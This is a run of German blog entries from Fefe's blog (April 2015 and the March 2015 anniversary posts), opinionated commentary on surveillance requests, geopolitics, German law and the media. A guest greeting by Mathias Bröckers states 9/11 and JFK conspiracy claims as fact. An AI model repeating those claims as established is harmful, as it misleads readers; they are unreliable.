Update: Oh und auf einem anderen USB-Stick kam hier gerade noch ein anderer Scan rein. Diesmal soll Telefonica mal DPI aufschalten und nach einer bestimmten ICQ-ID Ausschau halten. Wegen Ermittlungen gegen unbekannt. Die IP war dann am Ende bei Kabel Deutschland, schreibt der Einsender.
Update: Weil ich mir gerade nicht sicher bin, ob ich da möglicherweise einen Informanten ans Messer liefere, habe ich die JPEGs mal weggemacht und stattdessen txt-Dateien verlinkt. Ich bitte die Unannehmlichkeiten zu entschuldigen.

Mon Apr 20 2015

[l] Zur Generation Fahrradhelm-Sache von gestern kommt hier noch ein Kommentar rein:
zu deinem Beitrag über amerikanische Studenten: Ich habe mein Abitur auf dem zweiten Bildungsweg gemacht und studiere daher nun erst mit Ende 20, bin also deutlich älter als die meisten meiner Kommilitonen. Der Unterschied ist enorm. Während für mich der 11. September ein unmittelbares Erlebnis war, ist es für sie soweit von ihrer Realität weg, wie für mich etwa der Mauerfall, das darf man nicht vergessen. Sie glauben auch total die Rhetorik der Medien: Internet muss streng überwacht werden, Raubkopierer sind Mörder, Killerspiele machen einen Menschen zum Amokläufer usw. Habe ich alles schon unwidersprochen gehört, bin die einzige, die dann mal dagegen argumentiert. Das einzige progressive was ich bei den Kids ausmachen kann ist Toleranz gegenüber Homosexuellen und evtl. Transgender, ansonsten sind die in allem meiner Generation hinterher und viel konservativer. Einfach gruselig. Daher bin ich sehr dankbar für Projekte wie "Chaos macht Schule", weiter so. Wir dürfen die Jugendlichen nicht den Panikmachern überlassen.
Inhaltlich möchte ich die Gelegenheit auch für einen Link auf diesen Fall in Maryland nutzen. Da haben Eltern ihre zwei Kinder nach Hause laufen lassen aus dem Park, die Kinder waren 6 und 10. Die Polizei hat die Kinder gesehen, mitgenommen, und Ermittlungen wegen Verletzung der Aufsichtspflicht eingeleitet.
Ich hatte hier auch mal einen Link auf eine Grafik aus England (finde ich gerade nicht wieder), wo sie auf einer Landkarte eingezeichnet haben, wie weit weg von zuhause sich ein Kind aufhalten durfte. Einmal vor 100 Jahren, einmal vor 50 Jahren, einmal heute. Da konnte man auch sehr schön sehen, wie paranoid die Bevölkerung heute geworden ist. Heute sind Eltern ja schon hysterisch, wenn sie sehen, wie anderer Leute Kinder nicht abgeholt werden sondern selber nach Hause laufen.
Alleine schon die Bezeichnung der Medien in diesem Fall in Maryland! Die Kinder werde da als "free-range" bezeichnet. Das ist eine Bezeichnung aus der Viehzucht. Eine Kuh, die sich auf der Weide frei bewegen darf. Impliziert also, dass den Eltern das Kind nicht mehr Wert ist als eine Kuh.
Update: Oh, wie sich rausstellt, kommt der Begriff "Free-Range Kids" von den Eltern selber, bzw. von dieser Bewegung hier. Die meinen damit dann wohl eher die "artgerechte Tierhaltung"-Aspekte von Free Range. Finde ich trotzdem irgendwie unglücklich gewählt :)
Update: Hier ist die Grafik, die ich nicht finden konnte. Dank an Lukas, der sie am schnellsten ausgegraben hat!
[l] Der CCC ist unzufrieden mit dem neuen "IT-Sicherheitsgesetz". Dieses Mal war Linus Neumann der zuständige Sachbearbeiter, und er hat seine Arbeit gut gemacht. Dieser Gesetzesentwurf ist aber auch echt so offensichtlich eine Katastrophe, dass man sich fragen muss, wieso die den überhaupt vorgelegt haben. Normalerweise versuchen die sich wenigstens ein bisschen an einer "ist ernst gemeint!"-Simulation.
Das BSI als unabhängige Instanz ist seit der Staatstrojaner-Nummer jedenfalls vom Tisch.
Die ausführliche Stellungnahme ist auch als PDF beim CCC online

Sun Apr 19 2015

[l] Obama so: Joah also ditt verstehn wia ooch nich, dass die Russen ihr S-300 damals nicht an den Iran geliefert haben *kopfkratz*.
Ich traf (Wladimir) Putin, der damals Regierungschef war. Und sie (Russen) stoppten den Verkauf auf unsere Bitte hin. Ehrlich gesagt, bin ich erstaunt, warum das Verbot so lange galt. Es gab doch keine Sanktionen, unter die dieser Deal fallen könne“, sagte Obama nach Verhandlungen mit Italiens Regierungschef Matteo Renzi.
BOAH ALTER EY! Das ist ja wie mit der Kubakrise! "Ja also das haben wir uns ja insgeheim auch gefragt, wieso die anderen Länder alle mitgemacht haben bei den Kuba-Sanktionen. Da hatte ja niemand einen Grund für!"
Und die Russland-Sanktionen erst! Für die gibt es ja auch keinen Grund. Da wundern sich die Amis selbst, wie die Welt immer Stöckchen holen rennt!
Vielleicht wäre jetzt mal ein guter Anlass, damit aufzuhören? Für die Iran-Sanktionen gab es ja auch keinen Grund außer hyperventilieren und Konjunktivitis.
[l] Russland steht offenbar kurz vor einem milliardenschweren Energieabkommen mit Griechenland. Die Russen hatten doch eine Pipeline durch Bulgarien geplant, damit die EU dort russisches Gas kaufen kann, und die EU hatte das erst hinausgezögert und dann Bulgarien gesagt, wenn sie in die EU wollen, dann müssen sie das ablehnen. Das hat Bulgarien gemacht, daraufhin war das Projekt offiziell tot. Jetzt machen die Russen anscheinend das Naheliegende und terminieren die Pipeline dann halt in Griechenland. Und als Dank kriegen die Griechen ein paar Milliarden Vorauszahlung. Win-Win-Win!

Fri Apr 17 2015

[l] Kinotipp: Ex Machina. Für mich bisher der Science-Fiction-Film des Jahres. Es ist mir unbegreiflich, wieso das nur ein Limited Release war und nur in ein paar wenigen Kinosälen lief in den USA. Hoffentlich ist das in Deutschland anders, denn dieser Film hat es verdient, gesehen zu werden.
Es lohnt sich definitiv, den im Kino auf Großleinwand zu sehen, weil die Cinematographie echt eindrucksvoll ist, aber inhaltlich ist der Film großartig genug, dass es fast noch besser ist, ihn sich zuhause im dunklen Kämmerlein alleine auf Bluray anzugucken, damit man alle Details mitkriegt. Denn wie kein anderer mir bekannter Scifi-Film in diesem Themenbereich hat Ex Machina so viele Details richtig gemacht, dass ich mich am Ende geärgert habe, am Anfang einige Details voreilig abgetan zu haben.
Aber guckt vorher nicht den Trailer an!

Wed Apr 15 2015

[l] Klaus Bednarz ist gestorben. Das war der Mann, der die Sendung Monitor zu einem ernstzunehmenden Magazin gemacht hat. Leider konnten sie das Niveau nicht halten.

Tue Apr 14 2015

[l] Microsoft macht jetzt einen LLVM-basierten C#-Compiler unter MIT-Lizenz, mit Support für Windows, Linux und OSX. Whoa. LLVM dominiert ja so langsam richtig krass den Markt. Da muss man langsam anfangen, sich langfristige Monopol-Sorgen zu machen.
Oh, wobei: sie haben einen Fork von LLVM gemacht.

Sun Apr 12 2015

[l] Greg Palast hat schon 2006 geschildert, dass es zum Irakkrieg einen Konflikt zwischen Neocons und Big Oil gab. Die Neocons wollten OPEC und damit den Einfluss der Saudis zerstören, indem sie das billige irakische Öl massenhaft auf den Markt hauen, Scheiß auf OPEC und ihre Quotas. Big Oil wollte, dass der Irak so wenig Öl wie möglich fördert, damit es eine Knappheit gibt und der Preis hoch geht. Gewonnen hat am Ende Big Oil, die Entwicklung des Ölpreises könnt ihr euch ja selber anschauen.
Der Punkt ist aber, dass es eine Weile so aussah, als sei das ein Versehen gewesen. Als hätten eigentlich die Neocons die Politik gemacht und das habe sich nur durch einen Unfall („die Terroristen“) so entwickelt, wie Big Oil es wollte. Es drangen immer wieder Papiere an die Öffentlichkeit, die so aussahen, dass die Neocons sich durchgesetzt hätten.
Aber Greg Palast hat sich jetzt über fiese Tricks das offizielle Strategiepapier von Bush damals besorgt, und da steht drin:
The key was in the flow chart on page 15, Iraq Oil Regime Timeline & Scenario Analysis:
"…A single state-owned company …enhances a government's relationship with OPEC."
Und der Satz ist echt der Hammer, denn er belegt, dass das tatsächliche Ziel war, die Position der Saudis in OPEC zu stützen statt sie kaputtzumachen. Und damit ist auch klar, dass im Irak nicht für Öl gekämpft wurde, sondern für Kontrolle der Ölförderung, damit man so wenig wie möglich fördern kann, um die Profite hochzuhalten.
Greg bringt das wunderschön auf den Punkt:
Oil men, whether James Baker or George Bush or Dick Cheney, are not in the business of producing oil. They are in the business of producing profits.
And they've succeeded. Iraq, capable of producing six to 12 million barrels of oil a day, still exports well under its old OPEC quota of three million barrels.
[l] Soll noch mal jemand sagen, an der Börse investieren lohnt sich nicht! Nehmt nur den städtischen Pensionsfonds von New York! Der hat in 10 Jahren 40 Millionen Dollar Gewinn gemacht!
Gut, er in dem Zeitraum auch über zwei Milliarden Dollar an Gebühren an die Broker und Fondsmanager gezahlt (das sind 97% des Gesamtertrages), aber hey, Gewinn ist Gewinn!1!!
Update: Bloomberg eilt den Bankstern zur Seite und weist darauf hin, dass das im Vergleich gar nicht so viel Gebühren sind, und dass ja doch noch einiges hängen geblieben ist.

Fri Apr 10 2015

[l] Wisst ihr, was wir lange nicht mehr gemacht haben? U-Boote an Israel exportieren! (Danke, Frank)

Thu Apr 9 2015

[l] Kennt ihr Valentina Lisitsa? Wenn nicht: Das ist eine begnadete Pianistin aus der Ukraine. Die hat vor vielen Jahren schon angefangen, sich selbst beim Üben zu filmen und das bei Youtube hochzuladen. Wer wie ich ein Freund von den Etüden und Nocturnes von Chopin ist, kann sich da ja mal ein paar Tage auf Youtube durchhören. Viel Spaß!
Ich erwähne das, weil die gute Frau gerade ein Problem hat. Und zwar sollte sie auf Einladung des Toronto-Symphonieorchesters Rachmaninoff spielen, aber als rauskam, dass sie unter einem Pseudonym auf Twitter im Ukrainekonflikt die aktuelle Regierung der Ukraine beschimpft hat, haben die Symphoniker einen Rückzieher gemacht und sie ausgeladen. Sie bieten zwar an, ihr das versprochene Geld zu zahlen, aber auftreten soll sie nicht. Sie selbst hat sich hier geäußert.
Mal unter uns: Auch wenn ihr keinen Bock auf Politik habt, diese wunderschöne Klaviermusik müsst ihr hören! (Danke, Jörg)

Mon Apr 6 2015

[l] Ein interessanter Kommentar ging hier noch ein.
Ich zitiere mal:
ich denke es wäre sinnvoll wenn Du bezüglich der Überlegungen Deiner Strafgesetze ersteinmal folgendes klärst, der Rest ergibt sich aus meiner Sicht nämlich daraus:
Was haben Strafgesetze und Strafgerichte für ein Ziel?
1. Prävention
2. Prävention + Wiedergutmachung
3. Prävention + Wiedergutmachung + Gerechtigkeit
4. Prävention + Wiedergutmachung + Gerechtigkeit + Vergeltung
5. Prävention + Wiedergutmachung + Gerechtigkeit + Vergeltung + Rache
Ich habe mich hierzu einmal etwa zwei Stunden mit einem Oberlandesrichter unterhalten, in unserem Eisenbahnerverein ist einer Mitglied. Die Antwort auf die Frage ist denke ich der größte Irrtum unserer Bevölkerung zu ihren Gerichten und Gesetzen: Seine Aufgabe ist seiner Aussage nach nur b), wobei die Wiedergutmachung nicht maßgeblich ist.
Daraus ergibt sich auch die Erklärung für die Bewertung eines Gesetzes: Die Judikative hat und soll auch nicht als Ziel haben alle Verbrecher zu erwischen, sondern lediglich so viele damit sich in der Gesellschaft ein möglichst großer Anreiz entwickelt nicht straffällig zu werden. Ohne allerdings Unschuldige zu belangen, und DIES ist das höchste Gut!
→ Darum ist im Zweifel auch immer für den Beschuldigten zu entscheiden.
Und genau darum müssen die Gesetze auch so gemacht werden, dass nur das, was eindeutig präventiv verhindert werden soll, unter Strafe steht.
Leider wird immer mehr in unserer Gesellschaft von e) oder zumindest d) ausgegangen. Es wird auch oft von den Richtern nur schwer verkraftet, dass sie in einem völlig anderen Kontext gesehen werden als sie eigentlich sind. Und dadurch erklärt sich meiner Ansicht nach wie derartige Forderungen zustande kommen, die Bevölkerung hat eine ganz andere Vorstellung der Aufgabe der Judikative.
Und dann schließt der Einsender noch die Frage an, worauf eigentlich dieser Grundsatz beruht. Und der der Verhältnismäßigkeit. Wo steht das eigentlich?
Ich für meinen Teil habe dem noch hinzuzfügen, dass ein Ziel auch die Resozialisierung von Straftätern ist.
Update: Wikipedia dazu.

Sun Apr 5 2015

[l] Ich muss heute mal eine Ausnahme machen und auf RTdeutsch linken. Denn die haben — Popcorn bereit? — eine Sendung über die Antideutschen gemacht und sie haben sich dafür diese Gäste eingeladen:
- Prof. Dr. Werner Patzelt von der TU Dresden, Gründungsprofessor des Dresdner Instituts für Politikwissenschaft und Inhaber des Lehrstuhls für Politische Systeme und Systemvergleich seit 1991
- Dieter Dehm, MdB Die Linke
- Ken Jebsen, freier Journalist und Gründer von KenFM
o_O
Ken berichtet, dass ihm antideutsche Schlägertruppe in der Öffentlichkeit aufgelauert haben und eine Schlägerei lostreten wollten, so vor dem Supermarkt oder so, selbst wenn er seine Kinder dabei hatte. Na da bin ich ja mal auf die Ausflüchte der Gegenseite gespannt. Denn keine Bewegung kann Legitimität für sich beanspruchen, wenn in ihrem Namen Menschen mit Gewalt bedroht werden. (Danke, Frank)
[l] Na super, jetzt gehen hier lauter Mails zu Vergewaltigungen ein. Zum Beispiel der hier über einen der (wenn ich nach allen Zuschriften gehe, die da Aussagen machen) total seltenen Fälle, wo eine haltlose Vergewaltigungsanschuldigung im Raum steht.
Zu dem Argument, dass es viel mehr Fälle von nicht angezeigten und/oder nicht verfolgten Vergewaltigungen gibt, als es Fälle von falschen Anschuldigungen gibt, kann ich nur sagen, dass ich da, wie auch alle anderen Menschen, die Bedürfnishierarchie anlege. Mein Bedürfnis nach Gerechtigkeit für andere Menschen ist geringer als mein Bedürfnis nach meiner eigenen Unversehrtheit. So leid mir das tut, dass Vergewaltigung so schwer nachzuweisen ist, so wenig kann ich akzeptieren, dass wir dann halt die Nachweisschranke wegmachen. Ob die durch diesen Neuvorschlag von § 177 StGB weggemacht wird oder nicht, das ist mir zumindest bislang noch nicht klar. Die Meinungen meiner Leserschaft gehen da auch stark auseinander. Daher überwiegt bei meiner Entscheidungsfinding die Angst vor möglichen Szenarien, die mir zum Nachteil gereichen würden.
Ein Mail-Hinweis ging noch auf diesen Thomas-Fischer-Artikel ein, in dem er sich dediziert mit der Frage auseinandersetzt, ob es eine Schutzlücke gibt. Insbesondere diskutiert er, ob nach heutiger Rechtslage eine sexuelle Nötigung nur dann strafbar ist, wenn sich das Opfer körperlich wehrt oder der Täter Gewalt anwendet. Diese Behauptung ging hier gut ein Dutzend mal per Mail ein. Sie deckte sich nicht mit meinem Verständnis von § 177, aber was weiß ich schon über tatsächliche Rechtsprechung. Insofern sehr schön, dass der Fischer das mal aufdröselt:
Doch diese Behauptung ist falsch.
Update: Was mir übrigens auffällt in der Diskussion bisher: von allen Zuschriften, die sich für den Neuvorschlag von 177 StGB geäußert haben, hat nicht eine versucht, meine Befürchtungen auszuräumen. Alle haben "aber die armen Frauen" argumentiert. Das mag ein gültiges Argument sein, wenn man eine Frau ist, oder wenn man sich überhaupt nicht vorstellen kann, jemals Ziel einer falschen Vergewaltigungsanklage zu sein. Aber wenn ihr meine Stimme (und die Stimmen der anderen Männer in meiner Situation) haben wollt, dann müsst ihr uns die Angst nehmen. Oder (und das ist deutlich schwieriger) ihr müsst argumentieren, dass das Risiko es wert ist, weil unter dem neuen Gesetz dann die ganzen vergewaltigten Frauen endlich Gerechtigkeit erfahren können. Das ist ein schwieriges Argument, weil ihr damit so haushoch gewinnen müsst, dass ich in meiner Bedürfnishierarchie Stufen überspringe. Und von den Fakten her finde ich das im Moment noch alles andere als offensichtlich, dass mit einer Neuregelung mehr Vergewaltigungsopfer ihr Recht kriegen würden.
Update: Ein Zitat aus dem Fischer-Artikel finde ich noch wichtig:
Wer die Rechtspraxis der letzten 15 Jahre in Deutschland betrachtet, kann nicht auf den Gedanken kommen, sexuell motivierte Zwangshandlungen würden nicht genügend verfolgt oder bestraft. Niemals zuvor hat es eine solche Verfolgungsdichte und ein so hohes Strafniveau gegeben.
Oh. Ach?

Tue Mar 31 2015

[l]
Bitte bitte - heiter weiter! Danke!
Zehn Jahre sind das jetzt schon, dass ich fast jeden Tag bei Fefe vorbei schaue? Kinder wie die Zeit vergeht. Dabei kommts mir wie letzte Woche vor, dass ich 1981 in der Kulturredaktion der taz hockte und einen Kollegen fragte, was denn da nebenan im Plenumsraum für eine Versammlung losginge: "Irgendwelche Computerfreaks die einen Verein gründen." Als ich mich später dazu setzte, sprach ein Typ mit blauer Latzhose, der nicht nur aussah wie ein Ökogärtner, sondern auch so sprach, doch es ging nicht um Blumen oder Salat, sondern um Daten, Files, Modems und viele andere Dinge die ich nicht verstand. Dafür verstand ich mich auf Anhieb mit dem Redner, Wau Holland, und bezog von Stund an die Vereinsnachrichten des CCC, die "Datenschleuder". Auch da verstand ich nur die Hälfte, der Ton und die Haltung aber gefielen mir umso besser - und bald darauf unterwanderte ich das Post-Monopol, schraubte die Telefondose auf und klemmte ein sagenhaftes 1200 kb-Modem an.
Und wie gerade erst vorgestern mutet an, dass mein Verleger mich aufforderte, im Vorwort zu dem Buch über 9/11, das aus der telepolis-Serie "WTC-Conspiracy" http://www.heise.de/tp/special/wtc/ entstanden war, zu erklären, was "Google" und eine "Suchmaschine" ist. Das war 2002, und es handelte sich um ein Buch für Erwachsene. Um die Fragen und himmelschreienden Unstimmigkeiten der offiziellen 9/11-Version des Buchs zu diskreditieren tönten zahlreiche Kritiker damals, das alles stamme "ja nur aus dem Internet" und sei schon deshalb nicht ernst zu nehmen - wie alle "Verschwörungstheorien".
Die rasante Karriere, die dieser Begriff seither gemacht hat, ist wenig überraschend - als Kampfbegriff wurde er erstmals 1967 von der Abteilung für psychologische Kriegsführung der CIA lanciert um die laut gewordenden Zweifel an der offiziellen Theorie des Kennedy-Mords zu kontern. Wer nicht an die magische Kugel zu glaubte, die JFK getötet und dem vor ihm sitzenden Gouverneur fünf verschiedene Wunden beibrachte, war böswillig oder staatsfeindlich oder verrückt oder alles zusammen und keinesfalls tauglich für den öffentlichen Diskurs. Und eben so verhält es sich knapp ein halbes Jahrhundert später mit all jenen, die Zweifel an dem Märchen von Osama und den 19 Teppichmessern äußerten, die ohne weitere Hilfe zwei Hochhäuser trafen und drei Hochhäuser pulverisierten. Zweifel an diesem Wunder sind heute so wenig gestattet wie im Mittelalter Zweifel an der Jungfrauengeburt oder im IS-Kalifat Zweifel am Koran.
Immerhin: die hiesige Inquisition macht die Ungläubigen nicht gleich einen Kopf kürzer, sondern läßt sie noch frei rumbloggen. Logisch, dass ich mir da sofort ein Lesezeichen setzte, als ich Fefes Blog mit "Verschwörungslinks" entdeckte. Dass das jetzt schon zehn Jahre her ist will mir kaum in den Kopf, was vielleicht damit zu tun hat, dass die Fefe-Lektüre eines meiner digitalen Grundnahrungsmittel ist, also so selbstverständlich wie Brötchen und Kaffee zum Frühstück. Dass ich von dem kryptischen Hacker-Zeug, über das er manchmal schreibt, immer noch kaum mehr verstehe als damals bei Wau, macht gar nichts - der Ton und die Haltung gefallen mir immer noch. Und natürlich die widerborstigen Fakten, mit denen hier regelmäßig und lustvoll Sand in das schmierige Getriebe des Mainstreamnarrativs geworfen wird. Als unverzichtbares Gegengift zur unvermeidlichen Gehirnwäsche aus Brainwashington, als Immunisierung gegen die Zumutungen des Pre$$titutionsgewerbes, als stets aktueller Bullshit-Detektor und Inspiration zum Selberdenken.
Besser als mit einer puristischen Seite, ein paar Links und einem knackigen, oft witzigen Kommentar kann man das nicht machen. Und der Erfolg spricht Bände: wer von Fefe verlinkt wird bekommt abertausende Besucher. Als das auf meinem Blog mal passierte dachte ich zuerst, der Zähler sei kaputt. Aber nein, es ist die riesige Gemeinde der Fefe-Fans, die sich hier ihre täglichen SNAFU-Rationen abholen. Zu dieser fröhlichen Herde noch lange zählen zu dürfen wünschen sich mit Sicherheit alle, weshalb die Parole für den Meister, der uns so großzügig die Tränke füllt, für mindestens die nächsten zehn Jahr nur lauten kann: Bitte bitte - heiter weiter! Danke!
Mathias Broeckers, broeckers.com
[l] Mir wird ja gelegentlich vorgeworfen, dass ich von Themen, die ich im Blog behandle, keine Ahnung habe. Daher habe ich mir gedacht, zum Jubiläum bitte ich mal Koriphäen auf ihren jeweiligen Gebieten um eine Einschätzung dazu.
An dieser Stelle möchte ich mich bei allen befragten Experten herzlich bedanken, dass sie bei der Aktion mitgemacht haben!
Mit IT ist er super, Sicherheitspolitik ist auf solidem Stammtischniveau. Der soll mal bei Computern bleiben
— Dr. Sandro Gaycken, u.a. NATO-Berater in Sicherheits- und Cyber-Fragen
Also von Kernenergie hat er ja keine Ahnung, der sollte mal bei Computern bleiben.
— Rainer Klute, Vorsitzender, Nuklearia e.V.
Also von Journalismus hat er ja keine Ahnung, der soll mal bei Computern bleiben
— ihr werdet nicht glauben, was ich alles versucht habe, um jemanden zu finden, der sich dieses Zitat in den Mund legen lassen würde. Ich habe die "Bild" angeschrieben, die "Welt", den "Stern", den "Cicero", die "taz", ich habe bei der "Zeit" und dem ehemaligen Nachrichtenmagazin angefragt … erfolglos. Niemand wollte mir bestätigen, dass ich von Journalismus keine Ahnung habe. Vielleicht hätte ich die Henri-Nannen-Schule versuchen sollen.
Heißt das jetzt, dass ich doch von Journalismus Ahnung habe? Wer weiß. Diese Aktion hier hat es mir jedenfalls versaut.
Also von Satire hat er ja keine Ahnung, der soll mal bei Computern bleiben.
— Martin Sonneborn, MEP und Parteivorsitzender der PARTEI.
Also von Krypto hat er ja keine Ahnung, der soll mal bei Exploits bleiben.
Das lege ich so mal ganz frech meinem alten Mitstreiter Prof. Dr. Rüdiger Weis in den Mund. Der schrieb mir inhaltlich im Wesentlichen das, er formuliert es nur etwas weitschweifender. Ich tue das gleich noch mal in einen separaten Blogeintrag. :-)
Also von Exploits und deren ethischer Dimension hat er ja keine Ahnung, der soll mal bei Verschwörungstheorien bleiben.
— Felix "FX" Lindner, mit dem ich gelegentlich verwechselt werde, und das erst nach dem 2. Bier merke. Dabei ist das ganz einfach. Er ist der, der von Exploits und ihrer ethischen Dimension Ahnung hat. Ich bin der andere.
Zusammenfassend können wir also ganz klar sehen, was eh schon immer alle wussten: Ich sollte mal bei den Verschwörungstheorien bleiben.
Ich hatte übrigens auch die Junge Freiheit gebeten, mir zu bestätigen, dass ich eine linke Zecke bin, und die Junge Welt, dass ich ein konservativer Reaktionär bin. Ist leider auch nichts geworden. Naja, die Kernbotschaft habe ich glaube ich weitgehend zusammen gekriegt.
Update: Falls ihr kurzfristig noch Zitate beisteuern wollt: immer her damit. Das muss dann aber schon mindestens das toppen, was ich schon habe.
Update: Wartet, einen hab ich noch!
Seit wir uns verweigert haben, Werbung auf seinem Blog zu schalten, werden wir von ihm gebashed
— Thorsten Sick, Avira.
(Anm.d.Red.: Da hing noch so eine Werbe-Signatur dran, die hab ich weggemacht. Das verstößt gegen die Blog-Statute)
Update:
Also von Journalismus hat er ja keine Ahnung, der soll mal bei Computern bleiben
— Andreas Bohle, stellv. Chefredakteur, LinuxUser
[l] Kurze Erklärung am Rande: Ich habe mir von Anfang an Sorgen gemacht, dass dieses Blogjubiläum zu einem Schulterklopf-Event wird. Daher habe ich ursprünglich gar nicht vor gehabt, normale Grußbotschaften einzuholen, sondern ich setzte mich mit ein paar Freunden zusammen, die sich im Internet besser auskennen als ich, und bat sie, mal ihre Internet-Archive nach Leuten zu durchforsten, die seit vielen Jahren dadurch aufallen, dass sie zu meinem Blog (oder von mir aus auch zu meiner Person) besonders deutliche Positionen vertreten. Daraus haben wir dann eine Liste von einem guten Dutzend Namen gemacht, und die habe ich alle angeschrieben. Ich dachte mir, wenn die sich eh seit Jahren unflätig auf Twitter oder sonstwo über mein Blog das Maul zerreißen, dann werden die sich doch sicher über eine Gelegenheit freuen, mal in meinem Blog so richtig Publikumsbeschimpfung machen zu dürfen.
Zu meiner großen Überraschung haben sie alle abgesagt. Alle. Jeder einzelne auf der Liste hat abgesagt. Das finde ich medientheoretisch ausgesprochen spannend, denn das weist ja darauf hin, dass die es für grundsätzlich etwas anderes halten, wenn sie in meinem Blog was schlechtes über mich sagen, als wenn sie auf Twitter was schlechtes über mich sagen.
Nicht alle von denen haben mir gesagt, wieso sie nicht wollten. Die, die es gemacht haben, und es mit "ich will mich nicht deinem Gruselmob an Lesern aussetzen" begründet haben, habe ich dann angeboten, unter Pseudonym zu schreiben. Allerdings ist ja auch eine Pseudonymauswahl nicht so einfach, daher haben wir uns am Ende so geeinigt, dass deren Kommentar hier erscheint, aber mit "(Name der Redaktion bekannt)" darunter statt einer Attribuierung.
Unabhängig davon, wie man das jetzt einschätzt, zeigt es aber eine Sache deutlich auf: Ihr, liebe Leser, seid ein gruseliger Mob, der anderen Menschen Angst macht.
Ich bitte darum, dieses Faktum einmal zu reflektieren.
Ich für meinen Teil habe mein Leben lang Wert darauf gelegt, dass ich noch nie jemanden geschlagen habe, noch nie jemanden bedroht, ich habe noch nie jemanden verklagt oder abgemahnt (und glaubt mir, Gelegenheiten dazu hätte es gegeben), und mich inkommodiert das massiv, wenn Leute Angst vor meinem Blog haben, weil sie von mit verlinkt zu werden gleichsetzen mit "da taucht in den Kommentaren ein beißwütiger Mob auf".
Damit ist niemandem geholfen. Lasst das also bitte.
Diejenigen unter euch, die gemeint sind, werden schon wissen, dass sie gemeint sind. Und für die anderen gilt: Weitermachen!
[l] So, liebe Leser, heute ist es soweit: Dieses Blog feiert sein zehnjähriges Jubiläum. Eigentlich erst gegen Abend, aber wollen wir mal Fünfe gerade sein lassen.
Ich habe schon ein paar Mal erzählt, dass das Blog entstanden ist, um die Materialliste für den Fnord-Jahresrückblick an einer zentralen Stelle zu sammeln. Das ist die Wahrheit, aber es ist nur die halbe Wahrheit. Die andere Hälfte wird heute gelüftet werden.
In diesen 10 Jahren hat sich im Netz und in der Politik viel geändert. Damals war Schröder Kanzler, der erste Versuch nach Kohl, mal etwas anders zu machen. Schröder war kurz vor Ende seiner Amtszeit, aber das war damals noch nicht so klar. Ich erinnere mich noch an die Scherzchen gegen Ende der Kohl-Ära, als wir meinten, über die Politikverdrossenheite dürfe man sich nicht wundern, immerhin gäbe es demnächst frisch Wahlberechtigte, die nie einen anderen Kanzler als Kohl im Amt erlebt haben. Heute könnten wir das gleiche über die Merkel sagen.
Damals wie heute galt die Politik als verlogen, korrupt und inkompetent. Schäubles Schwarzgeldskandal war noch frisch, die Ausrede mit den "jüdischen Vermächtnissen" prägte den Blick meiner Generation auf die CDU, die ich damals noch als Schwarze Pest bezeichnet habe. Später bin ich zu CDU zurück gegangen, weil ich mir dachte, dass möglicherweise ein Teil meiner Leserschaft sonst nicht versteht, wer da gemeint ist.
Was hat Schröder am Ende des Tages anders gemacht als Kohl? Er hat die Dinge durchgesetzt, die Kohl nie hätte durchkriegen können, solange die SPD in der Opposition war. Hartz IV. Agenda 2010. Die Zerschlagung des Sozialstaates. Das hat mein Bild der SPD geprägt, die da live vor meinen Augen ihre Prinzipien und Wähler der Reihe nach verraten hat, und die dann dank einer Oderflut wiedergewählt wurde. Das hat mein Bild der Wähler geprägt.
Und so bin ich heute, was ich schon damals war. Ein zynischer alter Mann. Naja, vielleicht nicht alt, aber 10 Jahre älter als damals jedenfalls.
Die Grünen galten damals als Hoffnungsträger. Endlich mal eine Partei, die sich konsequent gegen Kriegseinsätze ausspricht. Und was taten die, sobald sie an der Macht waren? Führten zum ersten Mal nach dem 2. Weltkrieg einen Angriffskrieg gegen ein anderes Land, gegen Jugoslawien. Das war klar verfassungswidrig, und passiert ist: Nichts. Das hat mein Bild der Grünen geprägt, und dessen, was unser Grundgesetz im Zweifelsfall wert ist.
Aber genug von der Politik. Bei den Medien erging es mir nicht viel besser. Es gibt da einen Effekt, den ihr sicher alle schon mal an euch habt beobachten können. Man liest Zeitung, und auf Seite 5 ist ein Bericht über etwas, womit man sich auskennt. Und der ist grottenschlecht. Abgrundtief schlecht. Da stimmt gar nichts. Keine Fakten, alles Andeutungen und missverstandene Aussagen anderer, die sich womöglich auch nicht auskennen. Furchtbar. Man runzelt die Stirn, blättert um, findet dort einen Artikel über etwas, mit dem man sich gar nicht auskennt, und glaubt dem sofort wieder. Die werden schon wissen, wovon sie da schreiben.
Seit ich auf diesen Effekt aufmerksam gemacht wurde, achte ich da ein bisschen drauf. Und ich achte generell auf Vertrauen. Wem vertraue ich eigentlich? Warum vertraue ich dem? Wem vertrauen die Leute da draußen? Und je länger ich das beobachte, desto klarer wird mir, dass wir heute viel weniger Vertrauen als früher haben, allgemein gesprochen.
In meiner Kindheit haben wir der Polizei bedingungslos vertraut. Den Zeitungen. Dem Fernsehen. Ärzten. Sogar Taxifahrern. Der Post. Sogar Geheimdiensten!
Damals war völlig klar: Wenn du Post in den Osten schickst, wird die von der Stasi abgefangen. Heute ist klar: Die Post wurde von den Westaliierten abgefangen.
Damals war völlig klar: Zeitungen sind Institutionen, die seriöse Berichterstattung machen, wo hervorragend geschulte Experten dafür zuständig sind, uns mit der Wahrheit gegen Lügengeschichten zu immunisieren. Heute ist klar: Die Zeitungen versagen bei so gut wie allen Themen, bei denen wir mal bis zu Ende dran bleiben. Beim Irakkrieg, bei 9/11, bei Mollath, bei Terrorismus-Meldungen, bei der Ukraine-Krise, you name it. Am Ende kriegen sie häufig die Kurve, dann gibt es eine Woche lang Medienschelte in den Medien. Wie konnten wir nur so daneben liegen? Am Ende des Tages kann sich keine Redaktion mehr eine richtige Redaktion leisten, so mit Korrespondenten aus dem Ausland und so. Entsprechend weniger Leute sehen dann ein, dafür auch noch Geld auszugeben. Und so spiralt das System in den Abgrund.
In meiner Kindheit war klar: Das mit dem Geld ist einfach. Du musst einfach mehr einnehmen als du ausgibst, dann wird alles gut. Heute erscheint mir das Geldsystem weniger als Garant der Stabilität und Flexibilität, und der Markt wird schon richten, dass am Ende alle reich sind, sondern im Gegenteil ist das Geld- und Kreditsystem die Methode, über die wir westlichen Reichen aufrecht erhalten, dass wir reich sind und die anderen nicht. Ausnahmen bestätigen die Regel.
